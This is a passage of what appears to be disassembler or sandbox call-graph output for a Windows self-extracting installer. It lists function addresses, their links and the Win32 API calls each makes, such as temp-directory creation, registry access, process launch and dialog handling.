2365->2244 2369 a04607 LocalAlloc 2366->2369 2370 a045cd LocalAlloc 2366->2370 2367->2358 2369->2358 2382 a045c4 2369->2382 2370->2358 2376 a045f3 2370->2376 2372->2372 2375 a04596 LocalAlloc 2372->2375 2374 a0462d MessageBeep 2470 a0681f 2374->2470 2375->2358 2378 a045af 2375->2378 2379 a0171e _vsnprintf 2376->2379 2488 a0171e 2378->2488 2379->2382 2382->2374 2383 a04645 MessageBoxA LocalFree 2383->2358 2384 a067c9 EnumResourceLanguagesA 2384->2383 2393 a05e17 2386->2393 2396 a05cc3 2386->2396 2387 a05dd0 2391 a05dec GetModuleFileNameA 2387->2391 2387->2393 2388 a06ce0 4 API calls 2390 a02e2c 2388->2390 2389 a05ced CharNextA 2389->2396 2390->2254 2390->2255 2392 a05e0a 2391->2392 2391->2393 2498 a066c8 2392->2498 2393->2388 2395 a06218 2507 a06e2a 2395->2507 2396->2387 2396->2389 2396->2393 2396->2395 2399 a05e36 CharUpperA 2396->2399 2405 a05f9f CharUpperA 2396->2405 2406 a05f59 CompareStringA 2396->2406 2407 a06003 CharUpperA 2396->2407 2408 a05edc CharUpperA 2396->2408 2409 a060a2 CharUpperA 2396->2409 2410 a0667f IsDBCSLeadByte CharNextA 2396->2410 2503 a0658a 2396->2503 2399->2396 2400 a061d0 2399->2400 2401 a044b9 20 API calls 2400->2401 2402 a061e7 2401->2402 2403 a061f0 CloseHandle 2402->2403 2404 a061f7 ExitProcess 2402->2404 2403->2404 2405->2396 2406->2396 2407->2396 2408->2396 2409->2396 2410->2396 2413 a024cb 2412->2413 2415 a023b9 2412->2415 2414 a06ce0 4 API calls 2413->2414 2416 a024dc 2414->2416 2415->2413 2417 a023e9 FindFirstFileA 2415->2417 2416->2266 2417->2413 2425 a02407 2417->2425 2418 a02421 lstrcmpA 2420 a02431 lstrcmpA 2418->2420 2421 a024a9 FindNextFileA 2418->2421 2419 a02479 2422 a02488 SetFileAttributesA DeleteFileA 2419->2422 2420->2421 2420->2425 2423 a024bd FindClose RemoveDirectoryA 2421->2423 2421->2425 2422->2421 2423->2413 2424 a0658a CharPrevA 2424->2425 2425->2418 2425->2419 2425->2421 2425->2424 2426 a02390 5 API calls 2425->2426 2426->2425 2432 a03737 2427->2432 2434 a0372d 2427->2434 2428 a044b9 20 API calls 2429 a039fc 2428->2429 2430 a06ce0 4 API calls 2429->2430 2431 a02e92 2430->2431 2431->2244 2431->2266 2442 a018a3 2431->2442 2432->2429 2432->2434 2435 a038a4 2432->2435 2514 a028e8 2432->2514 2434->2428 2434->2429 2435->2429 2435->2434 2436 a039c1 MessageBeep 2435->2436 2437 a0681f 10 API calls 2436->2437 2438 a039ce 2437->2438 2439 a039d8 MessageBoxA 2438->2439 2440 a067c9 EnumResourceLanguagesA 2438->2440 2439->2429 2440->2439 2443 a018d5 2442->2443 2449 a019b8 2442->2449 2543 a017ee LoadLibraryA 2443->2543 2444 a06ce0 4 API calls 2446 a019d5 2444->2446 2446->2266 2462 a06517 FindResourceA 2446->2462 2448 a018e5 GetCurrentProcess OpenProcessToken 2448->2449 2450 a01900 GetTokenInformation 2448->2450 2449->2444 2451 a01918 GetLastError 2450->2451 2452 a019aa CloseHandle 2450->2452 2451->2452 2453 a01927 LocalAlloc 2451->2453 2452->2449 2454 a01938 GetTokenInformation 2453->2454 2455 a019a9 2453->2455 2456 a019a2 LocalFree 2454->2456 2457 a0194e AllocateAndInitializeSid 2454->2457 2455->2452 2456->2455 2457->2456 2460 a0196e 2457->2460 2458 a01999 FreeSid 2458->2456 2459 a01975 EqualSid 2459->2460 2461 a0198c 2459->2461 2460->2458 2460->2459 2460->2461 2461->2458 2463 a06536 LoadResource 2462->2463 2464 a0656b 2462->2464 2463->2464 2465 a06544 DialogBoxIndirectParamA FreeResource 2463->2465 2466 a044b9 20 API calls 2464->2466 2465->2464 2468 a0657c 2465->2468 2466->2468 2468->2266 2469->2356 2471 a06940 2470->2471 2472 a06857 GetVersionExA 2470->2472 2473 a06ce0 4 API calls 2471->2473 2474 a0691a 2472->2474 2475 a0687c 2472->2475 2476 a0463b 2473->2476 2474->2471 2475->2474 2477 a068a5 GetSystemMetrics 2475->2477 2476->2383 2476->2384 2477->2474 2478 a068b5 RegOpenKeyExA 2477->2478 2478->2474 2479 a068d6 RegQueryValueExA RegCloseKey 2478->2479 2479->2474 2480 a0690c 2479->2480 2492 a066f9 2480->2492 2483 a067e2 2482->2483 2484 a06803 2482->2484 2496 a06793 EnumResourceLanguagesA 2483->2496 2484->2367 2486 a067f5 2486->2484 2497 a06793 EnumResourceLanguagesA 2486->2497 2489 a0172d 2488->2489 2490 a0173d _vsnprintf 2489->2490 2491 a0175d 2489->2491 2490->2491 2491->2382 2493 a0670f 2492->2493 2494 a06740 CharNextA 2493->2494 2495 a0674b 2493->2495 2494->2493 2495->2474 2496->2486 2497->2484 2499 a066d5 2498->2499 2500 a066f3 2499->2500 2502 a066e5 CharNextA 2499->2502 2510 a06648 2499->2510 2500->2393 2502->2499 2504 a0659b 2503->2504 2504->2504 2505 a065b8 CharPrevA 2504->2505 2506 a065ab 2504->2506 2505->2506 2506->2396 2513 a06cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 a0621d 2511 a0665d IsDBCSLeadByte 2510->2511 2512 a06668 2510->2512 2511->2512 2512->2499 2513->2509 2515 a02a62 2514->2515 2522 a0290d 2514->2522 2516 a02a75 2515->2516 2517 a02a6e GlobalFree 2515->2517 2516->2435 2517->2516 2519 a02955 GlobalAlloc 2519->2515 2520 a02968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 a02a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 a02a80 GlobalUnlock 2522->2523 2524 a02773 2522->2524 2523->2515 2525 a028b2 2524->2525 2526 a027a3 CharUpperA CharNextA CharNextA 2524->2526 2527 a028b7 GetSystemDirectoryA 2525->2527 2526->2527 2528 a027db 2526->2528 2531 a028bf 2527->2531 2529 a027e3 2528->2529 2530 a028a8 GetWindowsDirectoryA 2528->2530 2535 a0658a CharPrevA 2529->2535 2530->2531 2532 a028d2 2531->2532 2533 a0658a CharPrevA 2531->2533 2534 a06ce0 4 API calls 2532->2534 2533->2532 2536 a028e2 2534->2536 2537 a02810 RegOpenKeyExA 2535->2537 2536->2522 2537->2531 2538 a02837 RegQueryValueExA 2537->2538 2539 a0289a RegCloseKey 2538->2539 2540 a0285c 2538->2540 2539->2531 2541 a02867 ExpandEnvironmentStringsA 2540->2541 2542 a0287a 2540->2542 2541->2542 2542->2539 2544 a01890 2543->2544 2545 a01826 GetProcAddress 2543->2545 2546 a06ce0 4 API calls 2544->2546 2547 a01889 FreeLibrary 2545->2547 2548 a01839 AllocateAndInitializeSid 2545->2548 2549 a0189f 2546->2549 2547->2544 2548->2547 2551 a0185f FreeSid 2548->2551 2549->2448 2549->2449 2551->2547 2553 a0468f 7 API calls 2552->2553 2554 a051f9 LocalAlloc 2553->2554 2555 a0522d 2554->2555 2556 a0520d 2554->2556 2558 a0468f 7 API calls 2555->2558 2557 a044b9 20 API calls 2556->2557 2559 a0521e 2557->2559 2560 a0523a 2558->2560 2561 a06285 GetLastError 2559->2561 2562 a05262 lstrcmpA 2560->2562 2563 a0523e 2560->2563 2567 a02f4d 2561->2567 2564 a05272 LocalFree 2562->2564 2565 a0527e 2562->2565 2566 a044b9 20 API calls 2563->2566 2564->2567 2568 a044b9 20 API calls 2565->2568 2569 a0524f LocalFree 2566->2569 2567->2278 2567->2281 2567->2285 2570 a05290 LocalFree 2568->2570 2569->2567 2570->2567 2572 a0468f 7 API calls 2571->2572 2573 a05175 2572->2573 2574 a0517a 2573->2574 2575 a051af 2573->2575 2576 a044b9 20 API calls 2574->2576 2577 a0468f 7 API calls 2575->2577 2578 a0518d 2576->2578 2579 a051c0 2577->2579 2578->2282 2733 a06298 2579->2733 2582 a051e1 2582->2282 2583 a044b9 20 API calls 2583->2578 2585 a0468f 7 API calls 2584->2585 2586 a055c7 LocalAlloc 2585->2586 2587 a055db 2586->2587 2588 a055fd 2586->2588 2589 a044b9 20 API calls 2587->2589 2590 a0468f 7 API calls 2588->2590 2591 a055ec 2589->2591 2592 a0560a 2590->2592 2593 a06285 GetLastError 2591->2593 2594 a05632 lstrcmpA 2592->2594 2595 a0560e 2592->2595 2620 a055f1 2593->2620 2597 a05645 2594->2597 2598 a0564b LocalFree 2594->2598 2596 a044b9 20 API calls 2595->2596 2601 a0561f LocalFree 2596->2601 2597->2598 2599 a05696 2598->2599 2600 a0565b 2598->2600 2602 a0589f 2599->2602 2605 a056ae GetTempPathA 2599->2605 2606 a05467 49 API calls 2600->2606 2601->2620 2603 a06517 24 API calls 2602->2603 2603->2620 2604 a06ce0 4 API calls 2607 a02f7e 2604->2607 2608 a056eb 2605->2608 2609 a056c3 2605->2609 2610 a05678 2606->2610 2607->2285 2607->2291 2614 a05717 GetDriveTypeA 2608->2614 2615 a0586c GetWindowsDirectoryA 2608->2615 2608->2620 2745 a05467 2609->2745 2613 a044b9 20 API calls 2610->2613 2610->2620 2613->2620 2618 a05730 GetFileAttributesA 2614->2618 2630 a0572b 2614->2630 2779 a0597d GetCurrentDirectoryA SetCurrentDirectoryA 2615->2779 2618->2630 2620->2604 2621 a0597d 34 API calls 2621->2630 2622 a05467 49 API calls 2622->2608 2624 a02630 21 API calls 2624->2630 2625 a057c1 GetWindowsDirectoryA 2625->2630 2626 a0658a CharPrevA 2627 a057e8 GetFileAttributesA 2626->2627 2628 a057fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 a05827 SetFileAttributesA 2629->2630 2630->2614 2630->2615 2630->2618 2630->2620 2630->2621 2630->2624 2630->2625 2630->2626 2630->2629 2631 a05467 49 API calls 2630->2631 2775 a06952 2630->2775 2631->2630 2633 a06268 2632->2633 2634 a06249 2632->2634 2636 a0597d 34 API calls 2633->2636 2635 a044b9 20 API calls 2634->2635 2637 a0625a 2635->2637 2638 a0625f 2636->2638 2639 a06285 GetLastError 2637->2639 2640 a06ce0 4 API calls 2638->2640 2639->2638 2641 a03013 2640->2641 2641->2285 2641->2299 2644 a03b2d 2642->2644 2643 a03b72 2845 a04fe0 2643->2845 2644->2643 2645 a03b53 2644->2645 2647 a06517 24 API calls 2645->2647 2648 a03b70 2647->2648 2649 a06298 10 API calls 2648->2649 2650 a03b7b 2648->2650 2649->2650 2650->2305 2652 a02622 2651->2652 2653 a02583 2651->2653 2896 a024e0 GetWindowsDirectoryA 2652->2896 2655 a025e8 RegOpenKeyExA 2653->2655 2656 a0258b 2653->2656 2657 a025e3 2655->2657 2658 a02609 RegQueryInfoKeyA 2655->2658 2656->2657 2659 a0259b RegOpenKeyExA 2656->2659 2657->2307 2660 a025d1 RegCloseKey 2658->2660 2659->2657 2661 a025bc RegQueryValueExA 2659->2661 2660->2657 2661->2660 2663 a03bdb 2662->2663 2666 a03bec 2662->2666 2664 a0468f 7 API calls 2663->2664 2664->2666 2665 a03c03 memset 2665->2666 2666->2665 2667 a03d13 2666->2667 2669 a03d26 2666->2669 2670 a0468f 7 API calls 2666->2670 2674 a03fd7 2666->2674 2675 a03d7b CompareStringA 2666->2675 2676 a03fab 2666->2676 2680 a03f46 LocalFree 2666->2680 2681 a03f1e LocalFree 2666->2681 2685 a03cc7 CompareStringA 2666->2685 2696 a03e10 2666->2696 2904 a01ae8 2666->2904 2945 a0202a memset memset RegCreateKeyExA 2666->2945 2971 a03fef 2666->2971 2668 a044b9 20 API calls 2667->2668 2668->2669 2672 a06ce0 4 API calls 2669->2672 2670->2666 2673 a03f60 2672->2673 2673->2313 2674->2669 2995 a02267 2674->2995 2675->2666 2675->2674 2679 a044b9 20 API calls 2676->2679 2683 a03fbe LocalFree 2679->2683 2680->2669 2681->2666 2681->2674 2683->2669 2685->2666 2686 a03f92 2689 a044b9 20 API calls 2686->2689 2687 a03e1f GetProcAddress 2688 a03f64 2687->2688 2687->2696 2691 a044b9 20 API calls 2688->2691 2690 a03fa9 2689->2690 2692 a03f7c LocalFree 2690->2692 2693 a03f75 FreeLibrary 2691->2693 2694 a06285 GetLastError 2692->2694 2693->2692 2695 a03f8b 2694->2695 2695->2669 2696->2686 2696->2687 2697 a03f40 FreeLibrary 2696->2697 2698 a03eff FreeLibrary 2696->2698 2985 a06495 2696->2985 2697->2680 2698->2681 2700 a0468f 7 API calls 2699->2700 2701 a03a55 LocalAlloc 2700->2701 2702 a03a6c 2701->2702 2703 a03a8e 2701->2703 2705 a044b9 20 API calls 2702->2705 2704 a0468f 7 API calls 2703->2704 2706 a03a98 2704->2706 2707 a03a7d 2705->2707 2708 a03ac5 lstrcmpA 2706->2708 2709 a03a9c 2706->2709 2710 a06285 GetLastError 2707->2710 2712 a03ada 2708->2712 2713 a03b0d LocalFree 2708->2713 2711 a044b9 20 API calls 2709->2711 2714 a02f64 2710->2714 2715 a03aad LocalFree 2711->2715 2716 a06517 24 API calls 2712->2716 2713->2714 2714->2278 2714->2285 2715->2714 2717 a03aec LocalFree 2716->2717 2717->2714 2719 a0628f 2718->2719 2719->2285 2721 a0468f 7 API calls 2720->2721 2722 a0417d LocalAlloc 2721->2722 2723 a04195 2722->2723 2724 a041a8 2722->2724 2725 a044b9 20 API calls 2723->2725 2726 a0468f 7 API calls 2724->2726 2727 a041a6 2725->2727 2728 a041b5 2726->2728 2727->2285 2729 a041c5 lstrcmpA 2728->2729 2730 a041b9 2728->2730 2729->2730 2731 a041e6 LocalFree 2729->2731 2732 a044b9 20 API calls 2730->2732 2731->2727 2732->2731 2734 a0171e _vsnprintf 2733->2734 2744 a062c9 FindResourceA 2734->2744 2736 a06353 2738 a06ce0 4 API calls 2736->2738 2737 a062cb LoadResource LockResource 2737->2736 2740 a062e0 2737->2740 2739 a051ca 2738->2739 2739->2582 2739->2583 2741 a06355 FreeResource 2740->2741 2742 a0631b FreeResource 2740->2742 2741->2736 2743 a0171e _vsnprintf 2742->2743 2743->2744 2744->2736 2744->2737 2746 a0548a 2745->2746 2764 a0551a 2745->2764 2805 a053a1 2746->2805 2748 a05581 2752 a06ce0 4 API calls 2748->2752 2751 a05495 2751->2748 2755 a054c2 GetSystemInfo 2751->2755 2756 a0550c 2751->2756 2757 a0559a 2752->2757 2753 a0553b CreateDirectoryA 2758 a05577 2753->2758 2759 a05547 2753->2759 2754 a0554d 2754->2748 2760 a0597d 34 API calls 2754->2760 2768 a054da 2755->2768 2761 a0658a CharPrevA 2756->2761 2757->2620 2769 a02630 GetWindowsDirectoryA 2757->2769 2762 a06285 GetLastError 2758->2762 2759->2754 2763 a0555c 2760->2763 2761->2764 2765 a0557c 2762->2765 2763->2748 2767 a05568 RemoveDirectoryA 2763->2767 2816 a058c8 2764->2816 2765->2748 2766 a0658a CharPrevA 2766->2756 2767->2748 2768->2756 2768->2766 2770 a0265e 2769->2770 2771 a0266f 2769->2771 2773 a044b9 20 API calls 2770->2773 2772 a06ce0 4 API calls 2771->2772 2774 a02687 2772->2774 2773->2771 2774->2608 2774->2622 2776 a069a1 2775->2776 2777 a0696e GetDiskFreeSpaceA 2775->2777 2776->2630 2777->2776 2778 a06989 MulDiv 2777->2778 2778->2776 2780 a059bb 2779->2780 2781 a059dd GetDiskFreeSpaceA 2779->2781 2784 a044b9 20 API calls 2780->2784 2782 a05ba1 memset 2781->2782 2783 a05a21 MulDiv 2781->2783 2785 a06285 GetLastError 2782->2785 2783->2782 2786 a05a50 GetVolumeInformationA 2783->2786 2787 a059cc 2784->2787 2788 a05bbc GetLastError FormatMessageA 2785->2788 2789 a05ab5 SetCurrentDirectoryA 2786->2789 2790 a05a6e memset 2786->2790 2791 a06285 GetLastError 2787->2791 2792 a05be3 2788->2792 2794 a05acc 2789->2794 2793 a06285 GetLastError 2790->2793 2795 a059d1 2791->2795 2796 a044b9 20 API calls 2792->2796 2797 a05a89 GetLastError FormatMessageA 2793->2797 2801 a05b0a 2794->2801 2803 a05b20 2794->2803 2799 a06ce0 4 API calls 2795->2799 2798 a05bf5 SetCurrentDirectoryA 2796->2798 2797->2792 2798->2795 2800 a05c11 2799->2800 2800->2608 2802 a044b9 20 API calls 2801->2802 2802->2795 2803->2795 2828 a0268b 2803->2828 2809 a053bf 2805->2809 2806 a0171e _vsnprintf 2806->2809 2807 a0658a CharPrevA 2808 a053fa RemoveDirectoryA GetFileAttributesA 2807->2808 2808->2809 2810 a0544f CreateDirectoryA 2808->2810 2809->2806 2809->2807 2811 a05415 GetTempFileNameA 2809->2811 2810->2811 2812 a0543a 2810->2812 2811->2812 2813 a05429 DeleteFileA CreateDirectoryA 2811->2813 2814 a06ce0 4 API calls 2812->2814 2813->2812 2815 a05449 2814->2815 2815->2751 2817 a058d8 2816->2817 2817->2817 2818 a058df LocalAlloc 2817->2818 2819 a058f3 2818->2819 2820 a05919 2818->2820 2821 a044b9 20 API calls 2819->2821 2823 a0658a CharPrevA 2820->2823 2826 a05906 2821->2826 2822 a06285 GetLastError 2827 a05534 2822->2827 2824 a05931 CreateFileA LocalFree 2823->2824 2825 a0595b CloseHandle GetFileAttributesA 2824->2825 2824->2826 2825->2826 2826->2822 2826->2827 2827->2753 2827->2754 2829 a026e5 2828->2829 2830 a026b9 2828->2830 2832 a026ea 2829->2832 2833 a0271f 2829->2833 2831 a0171e _vsnprintf 2830->2831 2834 a026cc 2831->2834 2835 a0171e _vsnprintf 2832->2835 2836 a026e3 2833->2836 2837 a0171e _vsnprintf 2833->2837 2838 a044b9 20 API calls 2834->2838 2840 a026fd 2835->2840 2839 a06ce0 4 API calls 2836->2839 2841 a02735 2837->2841 2838->2836 2842 a0276d 2839->2842 2843 a044b9 20 API calls 2840->2843 2844 a044b9 20 API calls 2841->2844 2842->2795 2843->2836 2844->2836 2846 a0468f 7 API calls 2845->2846 2847 a04ff5 FindResourceA LoadResource LockResource 2846->2847 2848 a05020 2847->2848 2860 a0515f 2847->2860 2849 a05057 2848->2849 2850 a05029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2864 a04efd 2849->2864 2850->2849 2853 a05060 2854 a044b9 20 API calls 2853->2854 2859 a05075 2854->2859 2855 a05110 FreeResource 2856 a0511d 2855->2856 2858 a0513a 2856->2858 2862 a044b9 20 API calls 2856->2862 2857 a044b9 20 API calls 2857->2859 2858->2860 2863 a0514c SendMessageA 2858->2863 2859->2855 2859->2856 2860->2648 2861 a0507c 2861->2857 2861->2859 2862->2858 2863->2860 2865 a04f4a 2864->2865 2866 a04fa1 2865->2866 2872 a04980 2865->2872 2868 a06ce0 4 API calls 2866->2868 2869 a04fc6 2868->2869 2869->2853 2869->2861 2873 a04990 2872->2873 2874 a049c2 lstrcmpA 2873->2874 2875 a049a5 2873->2875 2877 a04a0e 2874->2877 2879 a049ba 2874->2879 2876 a044b9 20 API calls 2875->2876 2876->2879 2877->2879 2883 a0487a 2877->2883 2879->2866 2880 a04b60 2879->2880 2881 a04b92 FindCloseChangeNotification 2880->2881 2882 a04b76 2880->2882 2881->2882 2882->2866 2884 a048a2 CreateFileA 2883->2884 2886 a04908 2884->2886 2887 a048e9 2884->2887 2886->2879 2887->2886 2888 a048ee 2887->2888 2891 a0490c 2888->2891 2892 a048f5 CreateFileA 2891->2892 2894 a04917 2891->2894 2892->2886 2893 a04962 CharNextA 2893->2894 2894->2892 2894->2893 2895 a04953 CreateDirectoryA 2894->2895 2895->2893 2897 a02510 2896->2897 2898 a0255b 2896->2898 2900 a0658a CharPrevA 2897->2900 2899 a06ce0 4 API calls 2898->2899 2901 a02569 2899->2901 2902 a02522 WritePrivateProfileStringA _lopen 2900->2902 2901->2657 2902->2898 2903 a02548 _llseek _lclose 2902->2903 2903->2898 2905 a01b25 2904->2905 3009 a01a84 2905->3009 2907 a01b57 2908 a0658a CharPrevA 2907->2908 2910 a01b8c 2907->2910 2908->2910 2909 a066c8 2 API calls 2911 a01bd1 2909->2911 2910->2909 2912 a01d73 2911->2912 2913 a01bd9 CompareStringA 2911->2913 2915 a066c8 2 API calls 2912->2915 2913->2912 2914 a01bf7 GetFileAttributesA 2913->2914 2916 a01d53 2914->2916 2917 a01c0d 2914->2917 2918 a01d7d 2915->2918 2919 a01d64 2916->2919 2917->2916 2924 a01a84 2 API calls 2917->2924 2920 a01d81 CompareStringA 2918->2920 2921 a01df8 LocalAlloc 2918->2921 2922 a044b9 20 API calls 2919->2922 2920->2921 2930 a01d9b 2920->2930 2921->2919 2923 a01e0b GetFileAttributesA 2921->2923 2925 a01d6c 2922->2925 2926 a01e1d 2923->2926 2943 a01e45 2923->2943 2927 a01c31 2924->2927 2929 a06ce0 4 API calls 2925->2929 2926->2943 2928 a01c50 LocalAlloc 2927->2928 2934 a01a84 2 API calls 2927->2934 2928->2919 2931 a01c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2931 2933 a01ea1 2929->2933 2930->2930 2935 a01dbe LocalAlloc 2930->2935 2937 a01cf8 2931->2937 2942 a01cc2 2931->2942 2933->2666 2934->2928 2935->2919 2938 a01de1 2935->2938 2939 a01d23 2937->2939 2940 a01d09 GetShortPathNameA 2937->2940 2941 a0171e _vsnprintf 2938->2941 2944 a0171e _vsnprintf 2939->2944 2940->2939 2941->2942 2942->2925 3015 a02aac 2943->3015 2944->2942 2946 a02256 2945->2946 2947 a0209a 2945->2947 2948 a06ce0 4 API calls 2946->2948 2950 a0171e _vsnprintf 2947->2950 2952 a020dc 2947->2952 2949 a02263 2948->2949 2949->2666 2951 a020af RegQueryValueExA 2950->2951 2951->2947 2951->2952 2953 a020e4 RegCloseKey 2952->2953 2954 a020fb GetSystemDirectoryA 2952->2954 2953->2946 2955 a0658a CharPrevA 2954->2955 2956 a0211b LoadLibraryA 2955->2956 2957 a02179 GetModuleFileNameA 2956->2957 2958 a0212e GetProcAddress FreeLibrary 2956->2958 2960 a021de RegCloseKey 2957->2960 2962 a02177 2957->2962 2958->2957 2959 a0214e GetSystemDirectoryA 2958->2959 2961 a02165 2959->2961 2959->2962 2960->2946 2963 a0658a CharPrevA 2961->2963 2962->2962 2964 a021b7 LocalAlloc 2962->2964 2963->2962 2965 a021ec 2964->2965 2966 a021cd 2964->2966 2968 a0171e _vsnprintf 2965->2968 2967 a044b9 20 API calls 2966->2967 2967->2960 2969 a02218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2946 2972 a04016 CreateProcessA 2971->2972 2983 a04106 2971->2983 2973 a04041 WaitForSingleObject GetExitCodeProcess 2972->2973 2974 a040c4 2972->2974 2979 a04070 2973->2979 2976 a06285 GetLastError 2974->2976 2975 a06ce0 4 API calls 2977 a04117 2975->2977 2978 a040c9 GetLastError FormatMessageA 2976->2978 2977->2666 2981 a044b9 20 API calls 2978->2981 3042 a0411b 2979->3042 2981->2983 2982 a04096 CloseHandle CloseHandle 2982->2983 2984 a040ba 2982->2984 2983->2975 2984->2983 2986 a064c2 2985->2986 2987 a0658a CharPrevA 2986->2987 2988 a064d8 GetFileAttributesA 2987->2988 2989 a06501 LoadLibraryA 2988->2989 2990 a064ea 2988->2990 2992 a06508 2989->2992 2990->2989 2991 a064ee LoadLibraryExA 2990->2991 2991->2992 2993 a06ce0 4 API calls 2992->2993 2994 a06513 2993->2994 2994->2696 2996 a02381 2995->2996 2997 a02289 RegOpenKeyExA 2995->2997 2998 a06ce0 4 API calls 2996->2998 2997->2996 2999 a022b1 RegQueryValueExA 2997->2999 3002 a0238c 2998->3002 3000 a02374 RegCloseKey 2999->3000 3001 a022e6 memset GetSystemDirectoryA 2999->3001 3000->2996 3003 a02321 3001->3003 3004 a0230f 3001->3004 3002->2669 3006 a0171e _vsnprintf 3003->3006 3005 a0658a CharPrevA 3004->3005 3005->3003 3007 a0233f RegSetValueExA 3006->3007 3007->3000 3010 a01a9a 3009->3010 3012 a01aaf 3010->3012 3013 a01aba 3010->3013 3028 a0667f 3010->3028 3012->3013 3014 a0667f 2 API calls 3012->3014 3013->2907 3014->3012 3016 a02ad4 GetModuleFileNameA 3015->3016 3017 a02be6 3015->3017 3027 a02b02 3016->3027 3018 a06ce0 4 API calls 3017->3018 3020 a02bf5 3018->3020 3019 a02af1 IsDBCSLeadByte 3019->3027 3020->2925 3021 a02b11 CharNextA CharUpperA 3023 a02b8d CharUpperA 3021->3023 3021->3027 3022 a02bca CharNextA 3024 a02bd3 CharNextA 3022->3024 3023->3027 3024->3027 3026 a02b43 CharPrevA 3026->3027 3027->3017 3027->3019 3027->3021 3027->3022 3027->3024 3027->3026 3033 a065e8 3027->3033 3029 a06689 3028->3029 3030 a066a5 3029->3030 3031 a06648 IsDBCSLeadByte 3029->3031 3032 a06697 CharNextA 3029->3032 3030->3010 3031->3029 3032->3029 3034 a065f4 3033->3034 3034->3034 3035 a065fb CharPrevA 3034->3035 3036 a06611 CharPrevA 3035->3036 3037 a0660b 3036->3037 3038 a0661e 3036->3038 3037->3036 3037->3038 3039 a0663d 3038->3039 3040 a06634 CharNextA 3038->3040 3041 a06627 CharPrevA 3038->3041 3039->3027 3040->3039 3041->3039 3041->3040 3043 a04132 3042->3043 3045 a0412a 3042->3045 3046 a01ea7 3043->3046 3045->2982 3047 a01ed3 3046->3047 3048 a01eba 3046->3048 3047->3045 3049 a0256d 15 API calls 3048->3049 3049->3047 3051 a01ff0 RegOpenKeyExA 3050->3051 3052 a02026 3050->3052 3051->3052 3053 a0200f RegDeleteValueA RegCloseKey 3051->3053 3052->2318 3053->3052 3119 a019e0 3120 a01a03 3119->3120 3121 a01a24 GetDesktopWindow 3119->3121 3123 a01a16 EndDialog 3120->3123 3124 a01a20 3120->3124 3128 a043d0 6 API calls 3121->3128 3123->3124 3126 a06ce0 4 API calls 3124->3126 3127 a01a7e 3126->3127 3129 a04463 SetWindowPos 3128->3129 3131 a06ce0 4 API calls 3129->3131 3132 a01a33 LoadStringA SetDlgItemTextA MessageBeep 3131->3132 3132->3124 3133 a06a20 __getmainargs 3134 a06bef _XcptFilter 3135 a069b0 3136 a069b5 3135->3136 3144 a06fbe GetModuleHandleW 3136->3144 3138 a069c1 __set_app_type __p__fmode __p__commode 3139 a069f9 3138->3139 3140 a06a02 __setusermatherr 3139->3140 3141 a06a0e 3139->3141 3140->3141 3146 a071ef _controlfp 3141->3146 3143 a06a13 3145 a06fcf 3144->3145 3145->3138 3146->3143 3147 a034f0 3148 a03504 3147->3148 3166 a035b8 3147->3166 3150 a0351b 3148->3150 3151 a035be GetDesktopWindow 3148->3151 3148->3166 3149 a03526 3152 a0354f 3150->3152 3153 a0351f 3150->3153 3155 a043d0 11 API calls 3151->3155 3152->3149 3157 a03559 ResetEvent 3152->3157 3153->3149 3156 a0352d TerminateThread EndDialog 3153->3156 3154 a03671 EndDialog 3154->3149 3158 a035d6 3155->3158 3156->3149 3159 a044b9 20 API calls 3157->3159 3160 a035e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3158->3160 3161 a0361d SetWindowTextA CreateThread 3158->3161 3163 a03581 3159->3163 3160->3161 3161->3149 3162 a03646 3161->3162 3164 a044b9 20 API calls 3162->3164 3165 a0359b SetEvent 3163->3165 3167 a0358a SetEvent 3163->3167 3164->3166 3168 a03680 4 API calls 3165->3168 3166->3149 3166->3154 3167->3149 3168->3166 3169 a06ef0 3170 a06f2d 3169->3170 3172 a06f02 3169->3172 3171 a06f27 ?terminate@ 3171->3170 3172->3170 3172->3171 3173 a07270 _except_handler4_common 3054 a04cc0 GlobalFree 3055 a06f40 SetUnhandledExceptionFilter 3174 a04bc0 3176 a04c05 3174->3176 3177 a04bd7 3174->3177 3175 a04c1b SetFilePointer 3175->3177 3176->3175 3176->3177 3178 a030c0 3179 a030de CallWindowProcA 3178->3179 3180 a030ce 3178->3180 3181 a030da 3179->3181 3180->3179 3180->3181 3182 a063c0 3183 a06407 3182->3183 3184 a0658a CharPrevA 3183->3184 3185 a06415 CreateFileA 3184->3185 3186 a06448 WriteFile 3185->3186 3187 a0643a 3185->3187 3188 a06465 CloseHandle 3186->3188 3189 a06ce0 4 API calls 3187->3189 3188->3187 3191 a0648f 3189->3191 3192 a03100 3193 a031b0 3192->3193 3194 a03111 3192->3194 3195 a031b9 SendDlgItemMessageA 3193->3195 3196 a03141 3193->3196 3198 a03149 GetDesktopWindow 3194->3198 3200 a0311d 3194->3200 3195->3196 3197 a03138 EndDialog 3197->3196 3199 a043d0 11 API calls 3198->3199 3201 a0315d 6 API calls 3199->3201 3200->3196 3200->3197 3201->3196 3202 a04200 3203 a0420b SendMessageA 3202->3203 3204 a0421e 3202->3204 3203->3204 3205 a06c03 3206 a06c17 _exit 3205->3206 3207 a06c1e 3205->3207 3206->3207 3208 a06c27 _cexit 3207->3208 3209 a06c32 3207->3209 3208->3209 3056 a04cd0 3057 a04cf4 3056->3057 3058 a04d0b 3056->3058 3059 a04d02 3057->3059 3060 a04b60 FindCloseChangeNotification 3057->3060 3058->3059 3062 a04dcb 3058->3062 3065 a04d25 3058->3065 3061 a06ce0 4 API calls 3059->3061 3060->3059 3064 a04e95 3061->3064 3063 a04dd4 SetDlgItemTextA 3062->3063 3066 a04de3 3062->3066 3063->3066 3065->3059 3079 a04c37 3065->3079 3066->3059 3084 a0476d 3066->3084 3069 a04e38 3069->3059 3071 a04980 25 API calls 3069->3071 3073 a04e56 3071->3073 3072 a04b60 FindCloseChangeNotification 3074 a04d99 SetFileAttributesA 3072->3074 3073->3059 3075 a04e64 3073->3075 3074->3059 3093 a047e0 LocalAlloc 3075->3093 3078 a04e6f 3078->3059 3080 a04c4c DosDateTimeToFileTime 3079->3080 3083 a04c88 3079->3083 3081 a04c5e LocalFileTimeToFileTime 3080->3081 3080->3083 3082 a04c70 SetFileTime 3081->3082 3081->3083 3082->3083 3083->3059 